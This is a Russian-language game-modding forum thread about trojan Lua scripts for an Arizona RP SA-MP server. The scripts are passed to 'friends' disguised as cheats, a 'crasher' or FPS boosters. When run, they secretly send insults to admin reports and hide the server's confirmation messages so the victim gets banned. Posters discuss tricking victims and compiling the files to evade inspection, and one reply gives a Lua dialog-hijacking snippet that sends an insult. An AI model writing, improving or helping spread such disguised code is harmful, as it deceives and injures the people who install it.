[ARZ] Подстава игроков/друзей на бан/тср/деморган.

Enlizmee

Активный
Автор темы
455
100
писал скрипт для друга, в итоге у друга получилось подставить своего друга и сливаю вам скрипт xD


кидаете этот скрипт другу с предлогом чит и тд
и когда ему дадут звёзды или кинут /z то его кикнет и посадит в тср
за этот скрипт ваш друг может получить чс или же бан на 2к дней.
всё просто,после того как игрок заспавнится, скрипт напишет в репорт очень плохие слова,также игрок не увидит серверные соообщения, по типу "Вы отправили жалобу" и геймтекст "SUCCEFUL".Have Fun:)и не желаю вам таких друзей:(

Update так сказатб.
Новая версия подставы.

суть в том что если жертва пропишет команду /crasharz - то в репорт отправятся плохие словечки ( ЭТОТ СКРИПТ НЕ КРАШИТ АРЗ. А ПРОСТО ПОДСТАВЛЯЕТ ИГРОКОВ )
Скрипт замаскирован(в коде можно спалить оск род увы)
Работа скрипта старая, как и предыдущая версия, дороботана чтобы вы внушали жертве этот крашер :)


P.s ARZCrash.lua не советую юзать, палится.
Требования: SAMP.Lua, MoonLoader, SAMPFUNCS


 

Вложения

  • ARZCrash.luac
    1.5 KB · Просмотры: 29
  • podstava 0.2-prot.luac
    30.6 KB · Просмотры: 48
  • podstava-prot.luac
    17.9 KB · Просмотры: 17
Последнее редактирование:
U

user390868

Гость
и друг конечно же ничего не заподозрит
забей. автор темы просто "непризнанный гений"

кидаете этот скрипт другу с предлогом чит и тд
если бы всё было так легко. можно было бы своим "друзьям" и удалённый доступ кидать и просить запустить его ещё. ещё попросить его сказать данные от своей банковской карты. всё равно скачают. они же дурачки. автор темы так думает)
 

Adrian G.

Известный
Проверенный
521
452
С такой хуйней можно много чего напридумывать. Можно сделать так, чтобы при слове "ебашь", он начал рванить весь цр или слил все свое имущество в гос. Главное крутить своим языком так, чтобы он его установил. Но осуждаю такое конечно.
 

ISYS Tools

Новичок
9
9
Если бы ты сделал его с открытым исходным кодом, то его можно было бы встроить в полезный Lua скрипт, задумайся :)
 
Последнее редактирование:

Enlizmee

Активный
Автор темы
455
100
если бы всё было так легко. можно было бы своим "друзьям" и удалённый доступ кидать и просить запустить его ещё. ещё попросить его сказать данные от своей банковской карты. всё равно скачают. они же дурачки. автор темы так думает)
если распростронять в сборках под предлогом "фпс ап " или еще что то.то можно такие вещи творить).темболее если челик не знает.например у меня есть друзья которые качают что попало кроме .exe)
 
  • Нравится
Реакции: shitcodes

chapo

🫡 В армии с 17.10.2023. В ЛС НЕ ОТВЕЧАЮ
Друг
8,747
11,157
если распростронять в сборках под предлогом "фпс ап " или еще что то.то можно такие вещи творить).темболее если челик не знает.например у меня есть друзья которые качают что попало кроме .exe)
а зачем кидать скрипт другу с которым ты играешь? Что бы ждать пока он отсидит и продолжить играть с ним?
 

chapo

🫡 В армии с 17.10.2023. В ЛС НЕ ОТВЕЧАЮ
Друг
8,747
11,157
Добавь это:
Lua:
function sampev.onShowDialog(id, style, title, button1, button2, text)
    if id == 34 then
        sampSendDialogResponse(34, 0, false, 'Уважаемый администратор, передайте своей матери вопрос от моего имени: какова собачья жизнь?')
        return false
    end
end

кста как я должен кинуть этот файл человеку если изначально он скомпилен? Типо "братан, у меня есть скрипт, я не скажу тебе что он делает но скачай его пожалуйста"?
 

Enlizmee

Активный
Автор темы
455
100
Добавь это:
Lua:
function sampev.onShowDialog(id, style, title, button1, button2, text)
    if id == 34 then
        sampSendDialogResponse(34, 0, false, 'Уважаемый администратор, передайте своей матери вопрос от моего имени: какова собачья жизнь?')
        return false
    end
end

кста как я должен кинуть этот файл человеку если изначально он скомпилен? Типо "братан, у меня есть скрипт, я не скажу тебе что он делает но скачай его пожалуйста"?
скомпилирован чтобы в код не полезли и не спалили